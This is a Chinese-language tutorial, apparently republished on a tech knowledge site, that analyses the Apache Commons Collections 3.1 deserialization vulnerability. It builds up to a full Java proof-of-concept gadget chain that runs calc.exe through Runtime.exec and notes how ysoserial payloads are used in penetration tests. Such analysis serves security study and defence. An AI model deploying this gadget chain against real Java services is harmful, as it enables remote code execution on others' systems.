Apache Commons Collections反序列化漏洞的示例分析

一、简介

虽然网上已经有很多文章对这个组件的反序列化漏洞进行分析,但在这里还是记录一下。毕竟,这对Java反序列化漏洞的发展意义重大。

Apache Commons Collections是Java应用开发中一个非常常用的工具库,它添加了许多强大的数据结构,简化了Java应用程序的开发,已经成为Java处理集合数据的公认标准。像许多常见的应用如Weblogic、WebSphere、Jboss、Jenkins等都使用了Apache Commons Collections工具库,当该工具库出现反序列化漏洞时,这些应用也受到了影响,这也是反序列化漏洞如此严重的原因。

二、测试环境

jdk1.7.0_21 + commons-collections-3.1.jar

Apache Commons Collections组件历史版本下载地址:http://archive.apache.org/dist/commons/collections/binaries/,或者使用maven依赖:

<!– https://mvnrepository.com/artifact/commons-collections/commons-collections –>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>

在Java反序列化漏洞利用工具ysoserial(https://github.com/frohoff/ysoserial)中已经集成了该组件的漏洞利用payload;在渗透测试的时候,只需按照Java序列化数据的特征(以十六进制aced或者base64编码格式的rO0AB开头的数据)寻找Java反序列化的入口点,并根据Web应用猜测可能存在CommonsCollections组件,则可以直接使用ysoserial工具直接生成payload进行漏洞利用。

Apache Commons Collections反序列化漏洞的示例分析

三、漏洞分析

这里分析利用Transformer接口以及实现该接口的几个类构造的代码执行漏洞利用链。

Transformer接口

Transformer接口的定义十分简单,只定义了一个transform()方法,根据文档说明,该方法主要用于对象转换。实现该接口的类还是挺多的,这里主要利用以下3个实现类:ConstantTransformer、InvokerTransformer和ChainedTransformer。

package org.apache.commons.collections;public interface Transformer {    //对象转换    public Object transform(Object input);}

ChainedTransformer类

ChainedTransformer类定义了一个Transformer[]数组,并且在实现transform()方法的时候通过依次遍历该数组元素,并调用数组元素对应的Transformer实现类的transform()方法,将多个Transformer对象串起来。

public class ChainedTransformer implements Transformer, Serializable {    private final Transformer[] iTransformers;    ...            public ChainedTransformer(Transformer[] transformers) {        super();        iTransformers = transformers;    }    public Object transform(Object object) {        for (int i = 0; i < iTransformers.length; i++) {            object = iTransformers[i].transform(object);        }        return object;    }    ...}

InvokerTransformer类

InvokerTransformer类的transform()方法主要通过反射机制调用传入参数对象的某个方法,只需在构造InvokerTransformer对象的时候设置方法名、参数类型和参数值即可。

public class InvokerTransformer implements Transformer, Serializable {        /** The method name to call */    private final String iMethodName;    /** The array of reflection parameter types */    private final Class[] iParamTypes;    /** The array of reflection arguments */    private final Object[] iArgs;    ...    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {        super();        iMethodName = methodName;        iParamTypes = paramTypes;        iArgs = args;    }    //简化后的transform()方法,通过反射机制调用对象的方法    public Object transform(Object input) {        ...                Class cls = input.getClass();        Method method = cls.getMethod(iMethodName, iParamTypes);        return method.invoke(input, iArgs);                        ...      }}

ConstantTransformer类

ConstantTransformer类十分简单,直接返回传入对象。

public class ConstantTransformer implements Transformer, Serializable {    private final Object iConstant;    ...    public ConstantTransformer(Object constantToReturn) {        super();        iConstant = constantToReturn;    }        public Object transform(Object input) {        return iConstant;    }    ...}

根据上述情况,我们的目标是构造Runtime.getRuntime().exec()代码执行。很明显,我们需要借助InvokerTransformer类中transform()方法实现反射调用。如下所示,这里即是代码执行的源头:

package orz.vuln.poc;import org.apache.commons.collections.functors.InvokerTransformer;public class CommonsCollections {	public static void main(String[] args) throws Exception {        //通过InvokeTransformer类反射调用Runtime代码		InvokerTransformer invoker1 = new InvokerTransformer("getMethod", 				new Class[] {String.class, Class[].class}, 				new Object[] {"getRuntime", null});		InvokerTransformer invoker2 = new InvokerTransformer("invoke", 				new Class[] {Object.class, Object[].class}, 				new Object[] {null, null});		InvokerTransformer invoker3 = new InvokerTransformer("exec", 				new Class[] {String.class}, 				new Object[] {"calc.exe"});		invoker3.transform(invoker2.transform(invoker1.transform(Runtime.class)));				/*正常反射调用Runtime代码		Class clazz = Runtime.class;		Method m1 = clazz.getMethod("getRuntime", null);		Method m2 = clazz.getMethod("exec", String.class);		m2.invoke(m1.invoke(clazz, null), "calc.exe");		*/	}}

更进一步,我们发现可以借助ChainedTransformer类中的transform()方法代替invoker3.transform(invoker2.transform(invoker1.transform(Runtime.class))),即将上述多个InvokerTransformer对象初始化为Transformer[]数组,并且用Runtime.class初始化ConstantTransformer类对象,这样,就能构造出一条使用任意对象即可触发代码执行的Transformer调用链:

package orz.vuln.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;public class CommonsCollections {	public static void main(String[] args) throws Exception {		Transformer[] transformers = new Transformer[] {				new ConstantTransformer(Runtime.class),				new InvokerTransformer("getMethod", 						new Class[] {String.class, Class[].class},						new Object[] {"getRuntime", null}),				new InvokerTransformer("invoke", 						new Class[] {Object.class, Object[].class}, 						new Object[] {null, null}),				new InvokerTransformer("exec",						new Class[] {String.class},						new Object[] {"calc.exe"})		};				Transformer chainedTransformer = new ChainedTransformer(transformers);		chainedTransformer.transform("foo");	}}

接下来,我们希望通过反序列化触发调用Transformer对象transform()方法,达到代码执行的目的。

TransformedMap类

Apache Commons Collections中定义了一个TransformedMap类用来对Map进行某种变换,该类通过调用decorate()方法进行实例化,如下所示:

Apache Commons Collections反序列化漏洞的示例分析

并且在该类中还有个checkSetValue()方法,在该方法中实现了调用Transformer对象的transform()方法;根据该方法描述,checkSetValue()方法将在setValue()方法调用的时候被调用:

Apache Commons Collections反序列化漏洞的示例分析

因此,我们的思路是通过利用Map对象和构造的恶意Transformer对象初始化TransformedMap对象,再调用setValue()方法修改Map对象的值,代码如下:

package orz.vuln.poc;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;public class CommonsCollections {	public static void main(String[] args) throws Exception {		Transformer[] transformers = new Transformer[] {				new ConstantTransformer(Runtime.class),				new InvokerTransformer("getMethod", 						new Class[] {String.class, Class[].class},						new Object[] {"getRuntime", null}),				new InvokerTransformer("invoke", 						new Class[] {Object.class, Object[].class}, 						new Object[] {null, null}),				new InvokerTransformer("exec",						new Class[] {String.class},						new Object[] {"calc.exe"})		};				Transformer chainedTransformer = new ChainedTransformer(transformers);		//chainedTransformer.transform("foo");				Map map = new HashMap();		map.put("foo", "bar");		Map transformedMap = TransformedMap.decorate(map, null, chainedTransformer);		Map.Entry entry = (Map.Entry)transformedMap.entrySet().iterator().next();		entry.setValue("test");	}}

继续寻找通过反序列化触发setValue()方法执行的地方,最后在AnnotationInvocationHandler类的readObject()方法中找到了。

AnnotationInvocationHandler类

AnnotationInvocationHandler类的readObject()方法如下所示:

Apache Commons Collections反序列化漏洞的示例分析

由于该类不提供公开的构造方法进行初始化,所以,我们通过反射调用该类的构造方法,并使用恶意的TransformedMap对象进行初始化,就可以生成攻击payload。这里有个判断条件需要满足才能最终执行entry.setValue()方法,即

Apache Commons Collections反序列化漏洞的示例分析

根据代码溯源可知,clazz变量是一个注解子类对象的属性值,如果要满足clazz变量不为null的话,在Class clazz=map.get(str)中则需要满足str是我们使用的注解类的属性;在漏洞利用代码中我们使用了java.lang.annotation.Target注解,而该注解只有一个属性value,因此我们在map.put()时,需要保证key的值是value。

Apache Commons Collections反序列化漏洞的示例分析

最终,完整漏洞利用代码如下:

package orz.vuln.poc;import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;public class CommonsCollections {	public static void main(String[] args) throws Exception {				Transformer[] transformers = new Transformer[] {				new ConstantTransformer(Runtime.class),				new InvokerTransformer("getMethod", 						new Class[] {String.class, Class[].class},						new Object[] {"getRuntime", null}),				new InvokerTransformer("invoke", 						new Class[] {Object.class, Object[].class}, 						new Object[] {null, null}),				new InvokerTransformer("exec",						new Class[] {String.class},						new Object[] {"calc.exe"})		};				Transformer chainedTransformer = new ChainedTransformer(transformers);		//chainedTransformer.transform("foo");				Map map = new HashMap();		map.put("value", "bar");//由于使用java.lang.annotation.Target,此处key值必须为value		Map transformedMap = TransformedMap.decorate(map, null, chainedTransformer);		//Map.Entry entry = (Map.Entry)transformedMap.entrySet().iterator().next();		//entry.setValue("test");				Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");		Constructor ctor = clazz.getDeclaredConstructor(Class.class, Map.class);		ctor.setAccessible(true);		Object instance = ctor.newInstance(Target.class, transformedMap);				FileOutputStream fos = new FileOutputStream("D:/commonscollections.ser");		ObjectOutputStream oos = new ObjectOutputStream(fos);		oos.writeObject(instance);		oos.close();		fos.close();				FileInputStream fis = new FileInputStream("D:/commonscollections.ser");		ObjectInputStream ois = new ObjectInputStream(fis);		ois.readObject();		ois.close();		fis.close();	}}

上述内容就是Apache Commons Collections反序列化漏洞的示例分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

文章标题:Apache Commons Collections反序列化漏洞的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/23874

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月8日 下午10:39
下一篇 2022年9月8日 下午10:40

相关推荐

  • tencent files可不可以删除

    “tencent files”可以删除,但是不建议删除;“tencent files”文件是腾讯文件,其中储存的都是与腾讯软件有关的文件,例如QQ中的缓存文件,如果删除该文件,可能会导致腾讯的软件在使用的过程中出现异常。 本教程操作环境:windows10系统、DELL G3电脑。 tencent …

    2022年9月18日
    1.2K00
  • excel页面布局位置在哪

    excel页面布局位置: 1、双击打开WPS 2、点击新建进入,选择新建excel空白文档 3、选择打印预览功能 4、点击“页面布局” 5、点击查看整体页面布局即可 到此,关于“excel页面布局位置在哪”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想…

    2022年8月27日
    44400
  • python标准库模块之json库怎么使用

    前言 json,全称为JavaScript Object Notation,也就是JavaScript对象标记,通过对象和数组的组合表示数据,虽然构造简洁但是结构化程度非常高,是一种轻量级的数据交换格式。 作用 主要用于将python对象编码为json格式输出或存储,以及将json格式对象解码为py…

    2022年9月21日
    68000
  • wmiprvse.exe程序有什么作用

    “wmiprvse.exe”是windows管理规范程序;该程序是windows操作系统的一个组件,用于通过“WinMgmt.exe”程序处理WMI操作,能够实现为用户提供管理信息和企业环境中的控制功能。 本教程操作环境:windows10系统、DELL G3电脑。 wmiprvse.exe是什么程…

    2022年9月2日
    56200
  • docker中mysql开启日志怎么实现

    1.查看安mysql容器状态 docker ps 2.进入容器内部 docker exec -it 4ae9238c176a /bin/bash 3.登录mysql数据库 mysql -uroot -p123456 4.查看binlog日志是否开启,查看后关闭mysql 查看:show variab…

    2022年9月21日
    1.3K00
  • windows驱动精灵runtime error如何解决

    解决方法: 1、按下“win+r”打开运行,输入 regedit。 2、依次打开 HKEY_LOCAL_MACHINE/SOFTWARE/microsoft/Windows。 3、在CurrentVersion文件夹下找到Run文件夹。 4、将右侧任务栏中的“runtime”错误信息删除即可。 以上…

    2022年9月13日
    70100
  • windows todesk远程能听到对方说话吗

    todesk远程可以听到对方说话吗: 答:todesk远程可以听到对方说话。 1、当我们完成远程连接后,点击上方工具栏中的“语音沟通” 2、点击之后,只要对方连接上麦克风设备,你就可以听到对方说话了。 3、除了可以使用语音沟通外,你们还能够直接进行文字聊天。 4、不过一定要保证对方安装了麦克风设备,…

    2022年9月20日
    1.7K00
  • windows todesk远程软件安全吗

    todesk远程软件安全吗: 答:todesk远程软件非常安全。 1、客户端与中心服务器和高速通道集群通讯都采用高强度AEAD(Authenticated Encryption with Additional Data) xchacha20-ietf-poly1305算法。 2、在用户完成远程连接后…

    2022年9月20日
    84300
  • mysql如何对列求和

    在mysql中,可以使用SUM()函数来对列求和;SUM()是一个求总和的函数,可以返回指定列值的总和,语法“SELECT SUM(DISTINCT 列名) FROM 表名;”,“DISTINCT”运算符允许计算集合中的不同值;SUM()函数在计算时,会忽略列值为NULL的行。 本教程操作环境:wi…

    2022年9月22日
    1.4K00
  • mysql如何查询名列前茅条数据

    在mysql中,可以使用SELECT语句配合LIMIT子句来查询名列前茅条数据,语法为“SELECT *|字段名列表 FROM 表名 LIMIT 0,1;”。LIMIT子句可以指定查询结果从哪条记录开始显示,显示多少条记录,语法“LIMIT 初始位置,记录数”,而名列前茅条记录的位置是0;因此想要显…

    2022年9月24日
    96500
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部